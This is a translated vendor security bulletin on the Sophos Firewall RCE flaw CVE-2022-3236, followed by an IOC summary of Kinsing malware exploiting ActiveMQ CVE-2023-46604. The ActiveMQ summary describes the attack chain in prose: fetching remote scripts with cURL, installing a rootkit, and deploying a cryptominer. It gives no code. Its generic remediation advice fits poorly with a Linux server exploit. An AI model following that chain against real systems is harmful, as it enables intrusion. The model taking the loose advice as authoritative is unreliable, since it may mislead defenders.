Sophos Firewall Patch Released for Zero-Day RCE Vulnerability

Subject : Sophos Firewall Patch Released for Zero-Day RCE Vulnerability

Severity : Critical (CVE-2022-3236) CVSS v3.0 Score : 9.8

Date : 2023-12-11

Information

  Firewall is software or hardware. on the network that is responsible for checking information that passes into and out of the network system Rules will be established. To control the entry and exit of information It is to protect whether the data to be transmitted is secure or not. By comparing with the various rules that the user has set. But it depends on the user's own decision as well. If the data is not secure but receives permission from the user, the Firewall will allow it to pass through.

  Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

Incident

  Security software company Sophos has released an update patch to its firewall. After discovering that attackers were using a Zero-Day vulnerability to attack customer networks, This affects Sophos Firewall v19.0 MR1 (19.0.1) and older versions. The vulnerability involves code injection in the User Portal and Webadmin that could result in remote code execution.

  The vulnerability exists in the way that the Sophos Firewall handles user-supplied input. When an attacker sends a specially crafted request to the User Portal or Webadmin, they can trick the firewall into executing arbitrary code.

  The company said the vulnerability was targeted at a specific group of organizations. especially in the South Asian region To solve the problem, it is recommended to take steps so that the User Portal and Webadmin are not exposed to the WAN, or users can update to the latest supported version.

Pic 1.1 Sophos userportal page

Solution

  Users running older versions of Sophos Firewall must upgrade to the latest supported version.

  • v19.5 GA
  • v19.0 MR2 (19.0.2)
  • v19.0 GA, MR1 และ MR1-1
  • v18.5 MR5 (18.5.5)
  • v18.5 GA, MR1, MR1-1, MR2, MR3 และ MR4
  • v18.0 MR3, MR4, MR5 และ MR6
  • v17.5 MR12, MR13, MR14, MR15, MR16 และ MR17
  • v17.0 MR10

 

The important things is Security systems. We must concern and monitor as usual.
For more information please contact
Email :sales@inetms.co.th
065 149 2822 (Ms.Suphatson )
061 404 5895 (Ms.Thanyakan)
063 204 4534 (Ms.Atsamaphorn)
065 929 6330 (Ms.Kansinee)

 

References

–https://www.bleepingcomputer.com/news/security/sophos-backports-rce-fix-after-attacks-on-unsupported-firewalls/

–https://www.sophos.com/en-us/security-advisories/sophos-sa-20220923-sfos-rce

–https://ctf.in.th/ncert/1743/

–https://blog.invgate.com/patch-cve-2022-3236

–https://nvd.nist.gov/vuln/detail/CVE-2022-3236

–https://www.checkpoint.com/cyber-hub/cyber-security/what-is-remote-code-execution-rce/

https://www.pdpaplus.com/Article/Detail/138148/Firewall

 

Weekly Interesting CVE

Malware News or Campaign IOC/IOA

No

Campaign Name

Detection in Thailand​
(/1m Divs

Detection Date

Attack

Type

Severity

 

Description

 

Solution

1

Kinsing Used To Exploit ActiveMQ CVE-2023-46604 Vulnerability In Cryptomining Operations

25

12/12/2023

Cryptomining,​

Downloader,​

Rootkit,​

Tool,​

Vulnerability

Medium​

The vulnerability was published in October 2023 and tracked as CVE-2023-46604 It is being used to deliver Kinsing malware when a target is identified by an attacker's vulnerability scan. An attacker would exploit the OpenWire module in ActiveMQ to extract XML files from an attacker-controlled web server. When executing unauthorized code, cURL is used to pull additional shell scripts to perform various functions. on the victim's system. The script will download the rootkit. Remove other malware Download and run Kinsing and manage the firewall. The Kinsing malware proceeds to download and install the cryptominer and script so that it can bypass the network and further infect the victim's infrastructure. Kinsing malware analysis reveals payload repos, C2 infrastructure, and attack machines used primarily to target additional vulnerable servers. The malware itself is not obfuscated and has many functions. Including C2 URL retrieval and network scanning functionality, the Kinsing malware appears to be more focused on cryptominers and financial gain.​

1.Update your Antivirus, Windows last version, and the device you are using to the latest.​

2.Always check the link before clicking​

Ref. 1. https://blog.sekoia.io/activemq-cve-2023-46604-exploited-by-kinsing-and-overview-of-this-threat/ ​

19 December 2023

Viewed 254 time

Engine by shopup.com